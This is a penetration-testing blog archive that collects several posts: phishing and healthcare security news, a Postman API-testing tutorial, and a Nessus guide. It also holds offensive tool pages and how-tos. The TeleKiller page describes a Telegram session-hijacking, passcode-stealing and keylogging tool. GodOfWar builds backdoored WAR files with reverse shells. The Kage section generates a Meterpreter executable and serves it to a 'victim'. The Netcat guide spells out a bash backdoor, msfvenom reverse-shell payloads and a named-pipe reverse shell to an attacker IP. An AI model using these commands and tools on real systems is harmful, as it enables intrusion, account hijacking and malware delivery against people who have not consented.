Category Archives: penetration testing

Spear Phishing Report Card: Perfect Scores in School Security Pen Testing

In a new U.K.-based study, 100 percent of test spear phishing attacks gained access to sensitive university data in less than two hours.

That’s the word from joint efforts by nonprofit research firm Jisc and the U.K.’s Higher Education Policy Institute (HEPI), which evaluated 173 higher education providers recently. As noted by We Live Security/ESET, researchers were able to “reach student and staff personal information, override financial systems and access research databases,” often in less than an hour. Jisc also achieved perfect scores in breaching security when spear phishing was part of the test attack.

For Your Immediate Attention

Well-designed phishing attacks worked against both students and staff. The Jisc/HEPI report noted that “particularly at the start of the academic year, there has been an increase in student grant fraud.” In this type of attack, students receive emails promising free grant money if they supply banking details or click through to malicious attachments.

Staff members, meanwhile, are often sent supposedly urgent documents they need to unlock using university credentials, effectively giving attackers unfettered network access. Using available social data and published department structures on university websites enabled white-hat hackers to create custom-built emails that bypassed security at every participating institution.

It’s also worth noting that post-secondary distributed denial-of-service (DDoS) attacks are on the rise. In 2018, HEPI reported more than 1,000 DDoS attacks across 241 U.K. education and research facilities. These attacks are doubly concerning: As Jisc noted, data availability is critical to school success, especially during “clearing,” which sees unfilled university spaces matched with new student candidates.

Inability to access course or applicant data during this time could be financially and reputationally devastating. In addition, DDoS attacks are often used to mask other threat vectors. For example, a high-volume DDoS attack could increase the efficacy of spear phishing efforts by shifting security focus away from email compromise.

Avoiding the Hook of Spear Phishing

While higher learning institutions were the target industry in Jisc’s study, the lesson is applicable at scale: Well-written phishing emails are corporate compromise kryptonite.

Avoiding the spear phishing hook starts with recognizing the critical link between employees and email. Most users believe they’re above average when it comes to recognizing the danger signs of phishing, but this doesn’t pan out in practice. By implementing low-key warning processes that recognize key phishing tactics, companies can ensure staff are notified without fighting the “it won’t happen to me” battle.

IBM security experts also recommend implementing identity and access management (IAM) solutions that leverage user behavior analytics (UBA) to identify normal user behaviors and sound the alarm if strange access requests or odd resource use patterns emerge.

The post Spear Phishing Report Card: Perfect Scores in School Security Pen Testing appeared first on Security Intelligence.

TeleKiller – A Session Hijacking and Local Passcode Stealing Tool for Telegram on Windows


A tool for hijacking Telegram sessions and stealing the local passcode on Windows.

Features :
  • Session Hijacking
  • Local Passcode Stealer
  • Keylogger
  • Shell
  • Bypass Two-Step Verification
  • Bypass AV (Coming Soon)

Installation Windows
git clone https://github.com/ultrasecurity/TeleKiller.git
cd TeleKiller
pip install -r requirements.txt
python TeleKiller.py

Dependencies :
  • python 2.7
  • pyHook
  • pywin32


Operating Systems Tested
  • Windows 10
  • Windows 8.1
  • Windows 8
  • Windows 7

Thanks to
Milad Ranjbar
MrQadir


GodOfWar – Malicious Java WAR Builder With Built-In Payloads


A command-line tool to generate WAR payloads for penetration testing / red teaming purposes, written in Ruby.
Features
  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/--port)
  • Control over payload name.
    • Renaming avoids a suspicious payload name after deployment, to bypass URL name signatures.

Installation
$ gem install godofwar

Usage
$ godofwar -h 

Help menu:
-p, --payload PAYLOAD   Generates a war from one of the available payloads. (check -l/--list)
-H, --host IP_ADDR      Local or remote IP address for the chosen payload. (used with -p/--payload)
-P, --port PORT         Local or remote port for the chosen payload. (used with -p/--payload)
-o, --output [FILE]     Output file and the deployment name. (default is the payload's original name; check -l/--list)
-l, --list              List all available payloads.
-h, --help              Show this help message.

Example
List all payloads
$ godofwar -l
├── cmd_get
│   └── Information:
│ ├── Description: Command execution via web interface
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│ ├── Description: Remote file browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {"false"=>"No Settings required!"}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│ ├── Description: TCP bind shell
│ ├── OS: any
│ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│ ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│ ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload with LHOST and LPORT
godofwar -p reverse_shell -H 192.168.100.10  -P 9911 -o puppy
After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)
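
To actually catch the shell, a listener must already be waiting on the LHOST/LPORT pair baked into the payload. A minimal sketch using the values from the example above (netcat as the listener is an assumption; any TCP listener works, and "host" stands in for the server running the WAR):

# on the attacker machine (192.168.100.10), listen on the port passed via -P
nc -lvp 9911
# then trigger the payload by requesting the deployed JSP
curl http://host:8080/puppy/puppy.jsp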

Contributing
  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add some feature').
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.

Add More Backdoors
To contribute by adding more backdoors:
  1. Create a new folder under the payloads directory.
  2. Put your JSP file under the newly created directory (give it the same name as the directory).
  3. Update the payloads_info.json file (a hypothetical entry is sketched after this list) with
    1. description.
    2. supported operating system (try to make it universal though).
    3. configurations: default host and port.
    4. references: the payload origin or its creator credits.
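
For orientation, here is a hypothetical payloads_info.json entry; the field names are inferred from the -l/--list output shown earlier, so treat the exact schema as an assumption and mirror an existing entry in the repository before committing:

"my_backdoor": {
  "Description": "TCP reverse shell with hardcoded LHOST/LPORT",
  "OS": "any",
  "Settings": {"host": "attacker", "port": 4444},
  "References": ["credit the payload origin or its creator here"]
}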


Better API Penetration Testing with Postman – Part 3

In Part 1 of this series, we got started with Postman and generally creating collections and requests. In Part 2, we set Postman to proxy through Burp Suite, so that we could use its fuzzing and request tampering facilities. In this part, we will dig into some slightly more advanced functionality in Postman that you almost certainly want to leverage.

Collection Variables

Variables in Postman can be used in almost any field in the request. The syntax is to use double curly-braces on either side of them. There are a few places I can define them. If they’re relatively static, maybe I set them as collection variables. For example, I’ve been using http://localhost:4000 as my test host. If I change the test API’s port from 4000 to 4001, I don’t want to have to edit the URL of each request. Here’s how to move that into a collection variable. First, I open the edit dialog for that collection on the Collections list in the menu side-bar. I can either click the ... button or I can right-click the collection name itself. In either case, I get the same context menu, and I want to choose Edit.

This will open a dialog for editing the collection. The default view has the name of the collection and a description textbox, but there’s also a row of tabs between those two fields.

One of those tabs is called Variables. That’s the one we want; clicking it will open another dialog, for editing variables.

Postman collection variable editing interface

It has a grid containing a Variable column for the variable name, an Initial Value column, and a Current Value column. The differences between those two value columns relate to syncing through Postman’s paid features. What matters here is that you will enter the initial value, and then tab into the current value field. This will automatically copy the initial value into the current value field, and it will look as pictured. Now I have a collection variable called api_host, with a value of http://localhost:4000. I’m done editing variables, so I click the Update button.

It’s time to modify my requests to reference that variable instead of having their own hard-coded hostname and port.

Postman request, with the URL changed to point to a variable

I simply replace the applicable part of each URL with the placeholder: {{api_host}}
Hovering over the placeholder will expand it to tell me the value and scope. There’s some color-coding here to help us out too. The text turns orange when it’s valid, but would be red if I put an invalid variable name in.

I still have to update each request this one time, to make them use the variable. But in the future, if the port changes, if the API switches to HTTPS, or if I deploy my test API to a completely different host, I can just go back into my collection variables and update the values there, and my requests will all receive the change accordingly.

Now collection variables are fine for relatively static bits that won’t change much, but what if I’m testing multiple environments, deployments, or even multiple tenants in a multi-tenant solution? It’s likely I’ll want to use the same collection of requests but with different sets of variables. Environment Variables deal with that problem.

Environment Variables

You may have already noticed their interface on the top-right of the window. Let’s take a look:

Environment variable interface in Postman
  1. Environment selector drop-down, for choosing the active environment.
  2. Quick-look button, to take a peek at what’s set in your environment
  3. Manage Environments button, where the real editing happens.


To get started, we’ll want to click the Manage Environments button. That will open a large, but relatively empty dialog, with an Add button at the bottom. Click the Add button.

You will be presented with another dialog. This one looks almost the same as the Collection Variables dialog, except that it takes a name.

I’ve named mine LocalTest.

I’ve also added two variables: one called bearer_token, with a value of foo, and the other called user_id, with a value of 1.

Once I’ve finished editing, I click the Add button near the bottom of the dialog, and then close out of the Manage Environments dialog. There’s one final, important, oft-forgotten step before I can use the variable in this environment. I need to choose it from the Environment selector drop-down.

And now these additional variables are accessible in the same way as the api_host was above: {{bearer_token}} and {{user_id}}

Route Parameters

It’s common on modern APIs to use route parameters. Those are values supplied as part of the main path on the URL. For example, consider the following: http://localhost:4000/user/42/preferences

The number 42 in a URL like that is actually a parameter, most likely a user ID in this example. When the server-side application routes the incoming request, it will extract that value and make it readily available to the function or functions that ultimately handle the request and construct the response. This is a route parameter. It may be convenient to make this easily editable in Postman. The syntax for that is simply to put it directly into the URL in the form of a colon (:) followed by the parameter name. For this example request in Postman, I would enter it as {{api_host}}/user/:userId/preferences. Then, on the Params tab of the request, I can see it listed and set its value. In the image below, I set it to the user_id variable that I specified in the environment variables earlier.

I could have written my variable directly into the URL as well, but this way is cleaner, in my opinion.

Bearer Tokens

Imagine a scenario where you issue some sort of auth request, it responds with a bearer token, and then you need to use that token in all of your other requests. The manual way to do it would probably be to just issue the auth request, and then copy and paste the token from the response into an environment variable. All the other requests can then use that environment variable.

That will work okay, but it can be a pain if you have a token with a short lifespan. There’s a more elegant solution to this problem. Consider the following response:

We’ve issued our request and received a JSON response containing our token. Now I want to automate the process of updating my environment variable with the new bearer token. On the requests interface, there are several tabs. The one furthest to the right is called Tests. This is mainly for automatically examining the response to determine if the API is broken, like a unit test. But we can abuse it for our purpose with just a couple JavaScript statements.
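
A minimal sketch of such a script, assuming the response body is JSON with the token in a top-level field named token (adjust the field name to whatever your API actually returns):

// parse the JSON response body
const body = pm.response.json();
// store the token in the currently selected environment
pm.environment.set("bearer_token", body.token);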

I add the script above, click Save, and then run my request again. And it appears that everything happened exactly the same as the first time. But if I use the Quick Look button to see my environment variables…

I can see that the Current Value has been updated automatically. That’s the first step – I now have the value stored in a place that I can easily reference, but it doesn’t put that Bearer token on my requests for me. I have two options for that. The first option is that if I go to the request’s Authorization tab, I can set a bearer token from the type drop-down, and point it at my variable.

This approach is alright, but then I need to remember to set it on each request. However, the default Authorization Type on each new request is Inherit auth from parent. The parent, in this case, is the Collection. So if I switch this request back to that default type, I can then go into the Edit Collection settings (the same context menu I used for Collection variables), and go to the Collection’s Authorization tab.

It presents almost the same interface as the Authorization on the request, and I can set it the same way. The difference now is that it’s managed in one place – in the collection. And every new request I create will include that bearer token by default, unless I specifically change the type on that request. For example, my Authentication request likely doesn’t need the bearer token, so I might then set the type to No Auth on that request’s Authorization tab.

Occasionally, I run into applications where an XML or HTML body is returned containing the value that I want to extract. In those cases, the xml2Json function, which is built-in, is helpful for parsing the response.

Using xml2Json to marshall an HTML body into a JSON object
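
A minimal sketch of that pattern (the path html.body.token is a placeholder; the real path depends on the markup your application returns):

// convert the XML/HTML response text into a JavaScript object
const parsed = xml2Json(pm.response.text());
// drill into the converted structure and store the value we want
pm.environment.set("bearer_token", parsed.html.body.token);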

As one more note – there is the Pre-request Script tab, which uses the same basic scripting interface. As you might expect, it executes before the request is sent. I know some of my colleagues use it to set the Bearer tokens, which is a totally valid strategy, just not the approach I use. It can also be helpful where you need a nonce, although that’s again not something I typically encounter.
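
For example, a pre-request script that stamps a fresh value into the environment before every send might look like this (the variable name nonce is just an illustration):

// runs before the request fires, so each send carries a unique value
pm.environment.set("nonce", Date.now().toString());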

Next Steps

In Part 4, we will wrap up the series by incorporating some Burp Suite extensions to really power up our penetration testing toolchain. But this whole series is really dealing with tooling. There is a lot of background knowledge that can be a huge difference-maker for API testing, from a good understanding of OAuth, to token structures like JWT and SAML, to a really good understanding of CORS.

Beginner’s Guide to Nessus

In this article, we will learn about Nessus, a network vulnerability scanner. There are various network vulnerability scanners, but Nessus is one of the best because of its polished GUI, and it is therefore widely used in many organizations. The tool was developed by Renaud Deraison in 1998.

Table of Contents

  • Introduction to Nessus
  • Linux Installation
  • Running Vulnerability Scans
  • Windows Installation

Introduction to Nessus

Nessus is a network vulnerability scanner that uses the Common Vulnerabilities and Exposures (CVE) architecture for easy cross-linking between compliant security tools. Nessus uses the Nessus Attack Scripting Language (NASL), a simple language that describes individual threats and potential attacks. Nessus has a modular architecture consisting of centralized servers that conduct scanning and remote clients that allow administrator interaction. Administrators can include NASL descriptions of suspected vulnerabilities to develop customized scans. Noteworthy abilities of Nessus include:

  • Compatible with all major operating systems
  • Scans for vulnerabilities on local and remote hosts
  • Reports missing security patches in detail
  • Applies various attacks in order to pinpoint a vulnerability
  • Can schedule security audits
  • Runs security tests

Linux Installation

Let’s start with the installation on Linux. Here we are installing Nessus on an Ubuntu 18 machine. First, we will invoke a root shell using the sudo bash command. We are going to install Nessus using a .deb file that can be downloaded from the Nessus official website. We traverse to the directory where we downloaded the .deb file, make it executable, and then install it using the dpkg command.

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -i Nessus*.deb

Afterwards, as shown in the image, use the following command to run Nessus:

/etc/init.d/nessusd start
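
On newer systemd-based distributions, the equivalent is (assuming the service is registered under the name nessusd, as the package normally sets up):

sudo systemctl start nessusd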

Nessus will now be listening on port 8834; we open https://localhost:8834 in our default browser, which in our case is Mozilla Firefox. We will be greeted with a warning about the self-signed certificate. To use Nessus, we will have to get through this warning: first click on Advanced, followed by Accept the Risk and Continue.

Then it will ask you to create an account; as shown in the image, fill in the details for it.

Further, it will ask you for an activation code; provide it just as shown in the image below:

Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :

Running Vulnerability Scans

When you click on Create New Scan, there are multiple scan types to choose from, as you can see in the following image:

And then in the policies tab, you can generate different policies on which the scans are based.

There are various policy templates too, as shown in the image below:

In order to start a new scan, go to the scan templates, select a new scan, and then give it a name and a target IP, as shown in the following image:

Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses, which ranges from low to critical.

When you click on a vulnerability, for instance here we clicked on the first one, which is a critical threat, it will give you details about the vulnerability such as its severity, whether it’s RPC-related or not, its version, etc., as shown in the image below:

Next, we clicked on a different one, which is a high-level threat; again, it gives details about the vulnerability such as its severity, its version, etc., as shown in the image below:

Windows Installation

Download Nessus for Windows from the Nessus official website, and open it similarly in the browser to set it up.

Just like on Linux, we will be greeted with a warning about the certificate. To use Nessus, we will have to get through this warning: first click on Advanced, followed by Accept the Risk and Continue.

Then it will ask you to create an account; as shown in the image, fill in the details for it.

Further, it will ask you for an activation code; provide it just as shown in the image below:

And then you can start your scans in a similar way, just as shown above for Linux.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Beginner’s Guide to Nessus appeared first on Hacking Articles.

Kage: Graphical User Interface for Metasploit

Kage is a GUI for Metasploit RPC servers. It is a good tool for beginners to understand the workings of Metasploit, as it generates payloads and lets you interact with sessions. As this tool is still under development, it only supports windows/meterpreter and android/meterpreter so far. For it to work, you should have Metasploit installed on your system. The only dependency it requires is npm.

Installation

Use the following git command to install Kage:

git clone https://github.com/WayzDev/Kage.git

Go inside the kage folder and install npm with the following command:

apt-get install npm

Further, use the following command :

npm install

And then run it with the following command :

npm run dev

Once all the prerequisites are in place, Kage will run. Click on the start server button as shown in the image below:

The server will start running. Once the process is done, click on the close button as shown in the image below:
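
Under the hood, the start server button launches Metasploit’s RPC daemon for Kage to talk to. If you prefer to start it by hand and point the connect dialog at it, a sketch of the invocation looks like this (the username, password, and port are illustrative values, not Kage defaults):

msfrpcd -U msf -P s3cr3t -p 55553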

After clicking on the close button, it will automatically fill in all the details, and then you can click on the connect button to connect, as shown in the image below:

Once you are connected, it will show you the following windows :

Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.

After clicking on generate, it will create a new folder named kage (with a small k). Here, run a Python web server so that you can share your malware with the victim. To run the server, type:

python -m SimpleHTTPServer 80
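
On systems that only ship Python 3, the equivalent one-liner is:

python3 -m http.server 80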

Once the file is shared and executed, it will show the following details under the jobs heading :

And when you go to the sessions window through the dashboard, you will find a new session that has been created. Click on the Interact button to access the session.

After clicking on the interact button, the following window will open. Here, the first tab will show you all the information about the system.

The second tab will show you all the processes that are running on the victim’s PC.

And the third tab will give you all the information about its network. Here, you can run three commands through the buttons provided, i.e., ifconfig, netstat, and route, as shown in the image below:

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.

Comprehensive Guide on Netcat

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.

Table of Contents:

  • Introduction
  • Features
  • Getting Started with NC
  • Connecting to a Server
  • Fetching HTTP header
  • Chatting
  • Creating a Backdoor
  • Verbose Mode
  • Save Output to Disk
  • Port Scanning
  • TCP Delay Scan
  • UDP Scan
  • Reverse TCP Shell Exploitation
  • Randomize Port
  • File Transfer
  • Reverse Netcat Shell Exploitation
  • Banner grabbing

Introduction to Netcat

Netcat, or nc, is a utility tool that uses TCP and UDP connections to read from and write to a network. It can be used for both attacking and security. In the case of attacking, it can be driven by scripts, which makes it a quite dependable back end; and if we talk about security, it helps us debug the network along with investigating it.

Features

  • Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you control every character sent and view the raw, unfiltered responses.
  • Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.
  • Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you’re using.
  • Encrypt communication with SSL, and transport it over IPv4 or IPv6.
  • Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
  • Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.

Getting Started with NC

To get started with NC, the most basic option is the help command. This will show us all the options that we can use with Netcat. The help command is the following one:

nc -h

Connecting to a Server

Here, we will connect to an FTP server with the IP address 192.168.1.6. To connect to a server, we specify the port on which a particular service is running; in our case, the port is 21, i.e., FTP.

Syntax: nc [Target IP Address] [Target Port]

nc 192.168.1.6 21

As we can see in the given image, the server has vsFTPd installed, and after giving the login credentials we have successfully logged in to the FTP server.

Fetching HTTP header

We can use netcat to fetch information about any web server. Let’s get back to the server we connected to earlier; it also has an HTTP service running on port 80, so we connect to the HTTP service using netcat as we did earlier. After connecting to the server, we issue the request that will give us the header along with the source code of the HTTP service running on the remote server.

nc 192.168.1.6 80
HEAD / HTTP/1.0

As we can see in the given image, the header and source code are displayed through the netcat connection.

Chatting

Netcat can also be used to chat between two users. We need to establish a connection before chatting; to do this, we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation, and once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with different operating systems.

User 1

OS: Windows 10

IP Address: 192.168.1.4

Role: Listener

User 2

OS: Kali Linux

IP Address: 192.168.1.35

Role: Initiator

In each and every netcat scenario, this step is prominent: first, we have to create a listener. We will use the following command to create a listener:

nc -lvvp 4444

where,

[-l]: Listen Mode

[vv]: Verbose Mode {it can be used once, but we use it twice to be more verbose}

[p]: Local Port

Now it’s time to create an initiator; for this, we will just provide the IP address of the system where we started the listener, followed by the port number.

NOTE: Use the same port for the initiator that was used when creating the listener.

nc 192.168.1.4 4444

Creating a Backdoor

We can also use NC to create a backdoor on the target system that we can come back to at any time. The following command creates a backdoor on a Linux system:

nc -l -p 2222 -e /bin/bash

This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.

nc 192.168.1.35 2222
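
For a Windows target, the idea is identical except the listener pipes cmd.exe instead of bash (this assumes an nc build compiled with -e support is present on the target):

nc -l -p 2222 -e cmd.exe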

Verbose Mode

In netcat, verbose is a mode that can be initiated using the [-v] parameter. Verbose mode generates extended information. Basically, we will connect to a server using netcat twice to see the difference between normal and verbose mode. In the image given below, we can see that when we add [-v] to the netcat command, it displays information about the actions it performs while connecting to the server.

nc 192.168.1.6 21 -v

Save Output to Disk

For record maintenance, better readability, and future reference, we will save the output of Netcat. To do this, we will use Netcat’s -o parameter to save the output to a text file.

nc 192.168.1.6 21 -v -o /root/output.txt

Now that we have successfully executed the command, let’s traverse to the location to ensure whether the output has been saved to the file or not. In this case, our output location is /root/output.txt.

Port Scanning

Netcat can be used as a port scanner, although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter, which tells netcat to scan for listening daemons without sending any data. This makes it possible for netcat to determine the type of service that is running on that specific port. Netcat can perform TCP and UDP scans.

TCP Scan

nc -v -n -z -w 2 192.168.1.6 21-1100

Here,

  • [-v]: indicates Verbose mode
  • [-n]: indicates numeric-only IP addresses
  • [-z]: indicates zero-I/O mode [used for scanning]
  • [-w]: indicates timeout for connects and final net reads

Also, to perform a port scan, netcat needs a range of port numbers; we can provide a range of ports to scan.

From the given image we can see that the target machine has lots of ports open, with various services running on them.

TCP Delay Scan

In order not to be noisy in an environment, it is recommended to use a delayed scan. To perform a delayed scan, we need to specify the delay; we will use the [-i] parameter to specify the delay, in seconds, between sending each packet.

nc -z -v -i 10 192.168.1.6 21-80

UDP Scan

Netcat can scan UDP ports in a similar way to how it scans TCP ports. We are going to use the [-u] parameter to invoke UDP mode.

nc -vzu 192.168.1.6 80-90

Reverse TCP Shell Exploitation

We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe

We are using the shell_reverse_tcp payload to get a session. We have provided the local IP address and port and then exported the payload into an executable (exe) file. Now we will create a listener using netcat on the port we provided during payload creation. We will then have to send the payload file to the target; when the target runs the executable file, we will get a session on our netcat listener.

nc -lvvp 2124

Randomize Port

What if we can’t decide on a port of our own to start a listener or establish our Netcat connection? Netcat has a special -r parameter for us, which gives us a randomized local port.

nc -lv -r

File Transfer

Netcat can be used to transfer files across devices. Here we will create a scenario where we will transfer a file from a Windows system to a Kali Linux system. To send the file from Windows, we will use the following command:

nc -v -w 30 -p 8888 -l < C:\netcat\output.txt

Now we will have to receive the shared file on Kali Linux. Here we will provide netcat with the Windows IP address and the port that hosts the file, and write the output to a text file. For this, we will use the following command:

nc -v -w 2 192.168.1.4 8888 > output.txt
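
To confirm the file arrived intact, it is worth comparing hashes on both ends, for example with md5sum on Kali and the built-in certutil on Windows:

md5sum output.txt
certutil -hashfile C:\netcat\output.txt MD5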

Reverse Netcat Shell Exploitation

We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R

When you execute the above command, you will get another command that has to be run on the target system, as shown in the image below; once it is executed there, you will have your session, as shown in the image above.

Another way to get a reverse shell is by executing the following commands on the target system:

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc 192.168.1.35 443 1>/tmp/backpipe

And then when you start netcat as shown in the image below, you will have a session.

Banner Grabbing

To grab a target port’s banner with netcat, use the following command:

nc -v 192.168.1.2 22

So, this was a basic guide to netcat. It’s quite an interesting tool to use, and it is pretty easy as well.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Netcat appeared first on Hacking Articles.

The US Is Slow to Adopt EHRs, But That Might Actually Be a Good Thing for Healthcare Security

The healthcare industry is moving toward the universal use of electronic health records (EHRs), digital documentation that represents a secure record of our complete health history. With EHRs, your healthcare provider gets real-time access to your relevant medical data, enabling them to make faster and more accurate treatment decisions.

But all this data has to be stored somewhere. It’s no secret that the healthcare industry is hit hardest when it comes to data breaches, and healthcare security is going to play a huge role if the utopian vision of a purely digital ecosystem is to be realized.

In some countries, however, the medical system is already well on its way to becoming fully digital. In Sweden, for example, 41 percent (about 4.1 million) of the population had already created their own account to use personal e-services on the country’s online portal by June 2017, according to Philips. And in Canada, there are private initiatives to facilitate the EHR process by providing Canadians secure access to their health records.

So why is the U.S. not moving as quickly to adopt a digital system? There are many reasons for this reluctance — some political, some ethical and some based on the sheer number of healthcare providers and the population.

Still, cybersecurity may be the most critical factor. Perhaps incidents such as the flaw that left 170,000 hours of 2.7 million medical calls exposed online for six years in Sweden are prompting us to take our time.

Two Nations, Two Disparate Health Ecosystems

To get an idea of where the U.S. may be headed, we can look to Canada, a country with an estimated population of around 37 million. There, the Toronto-based Dot Health already has relationships with 3,000 healthcare providers across the country and provides an app for Canadians to display their health information in one place. The app updates data whenever it changes and the company goes over and above to secure it. How it protects the data is paramount, but we’ll address this later on.

In Canada, each province and territory is responsible for organizing and delivering health services and supervising providers. This territorial split represents the largest stumbling block for companies like Dot Health that want to be a catalyst for a fully digital system.

“If [healthcare] was federally done, it would be very different,” said Huda Idrees, founder and CEO of Dot Health. “It makes it really difficult when it seems each of the provinces is trying to compete with each other.”

Idrees explained that while a fully digital healthcare system in Canada may have its own set of challenges, the U.S. faces a particularly bumpy road ahead.

“Going digital [in the U.S.] is especially difficult in healthcare, where it’s completely out-of-pocket,” Idrees said. “There are very difficult innovations around EHR, and providers may not want to talk to each other because they have business interests that are in conflict.”

Surpassing Healthcare Security Standards

When it comes to data, the most coveted for threat actors is probably that which comes from the healthcare industry. Understandably, Idrees gets a lot of questions about security, privacy and information protection — a core focus for her company from the very beginning. For Dot Health, security must not only be much better than that of the healthcare providers; the company strives for excellence in data protection that exceeds standards in any industry, let alone healthcare.

To achieve this on a technical level, one example Idrees provided is in how they store health records. Instead of monolithic databases, the company spreads data over several databases that contain bits and pieces of what makes up a whole electronic health record.

“You would need to breach 12 different databases and also have the patient’s own login key in order to decipher one complete health record,” Idrees said.

Before going live, Dot Health spent eight months with third-party security specialists to help ensure compliance with all related legislation. On top of that, the company undergoes penetration testing from a third-party vendor three times a year.

In writing about healthcare security, I’ve learned that, unfortunately, pen testing rarely occurs that frequently for healthcare companies. But shouldn’t it, especially when providers are protecting our most sensitive health data?

Not So Fast, We Still Have Work to Do

Perhaps we’re getting ahead of ourselves. Before healthcare data becomes completely digital — or even partially digital — the industry has to be prepared for change. Independent security researcher Rod Soto said that healthcare in the U.S. has a long way to go before going all-in on EHRs.

“Although government regulation has helped to move [the industry] in the digital direction, the evolution of technology and standards sometimes goes faster than the speed of the industry’s willingness to keep up,” Soto said. “This situation where many of the acquired technologies quickly become outdated or obsolete does not match the conservative mindset of the healthcare industry, [and] pushes many organizations to just wait or simply not embrace digital transformation.”

The seemingly endless news about successful breaches and destructive attacks against healthcare institutions doesn’t help, either. So is there any sort of shift that needs to happen to turn the tide?

According to Soto, while a shift may occur, it won’t be anytime soon. “The healthcare industry is known for dealing with significant amounts of legacy, outdated, unmanaged and unpatched systems,” he said. “Malicious actors know this and actively target healthcare organizations.”

Threat actors know the value of the information those systems hold. Because they’ve had success with past breaches, they understand these institutions will pay a ransom if pressed and, if not, they can easily sell the information on the dark web.

Why We Should Wait to Go All-In on EHRs

This may be belaboring the obvious, but we need to be more proactive in keeping systems up to date and patching them to reduce the attack surface.

“That includes more manpower and stricter security controls,” Soto said. “I notice that a lot of the attacks on those organizations usually come from outdated, unmanaged systems.”

Soto does not recommend going fully digital without having a hard copy of records or an off-site backup.

“As antiquated as it may sound, in many instances, where either outages, destructive crimeware or ransomware campaigns have been successful, the hard copy and off-site backups have helped the affected organizations,” he added.

It sure seems like we need to take our time before transitioning to electronic health records. Given the current healthcare breach statistics — more than 2 million healthcare records were compromised in February 2019 alone, a 330 percent increase from January, according to HIPAA Journal — sitting back and watching how the transformation plays out in other countries may be the most prudent strategy.

In the meantime, those in the health industry should follow the Department of Health and Human Services’ cybersecurity guidelines for the healthcare sector, where professionals can share healthcare security best practices to mitigate risk and boost cybersecurity programs across the industry.

The post The US Is Slow to Adopt EHRs, But That Might Actually Be a Good Thing for Healthcare Security appeared first on Security Intelligence.

FireEye’s “Commando VM” Turns Your Windows PC Into Hacking Machine

FireEye’s Commando VM Turns Your Windows Computer Into A Hacking Machine

Cybersecurity company FireEye recently released an automated installation script called Complete Mandiant Offensive VM (“Commando VM”) aimed at penetration testers and red teamers.

According to the company, Commando VM is a “first of its kind Windows-based security distribution for penetration testing and red teaming.” This automation installation script turns a Windows operating system into a hacking system.

FireEye says that Commando VM originated from their company’s popular Flare VM that focuses on reverse engineering and malware analysis platform.

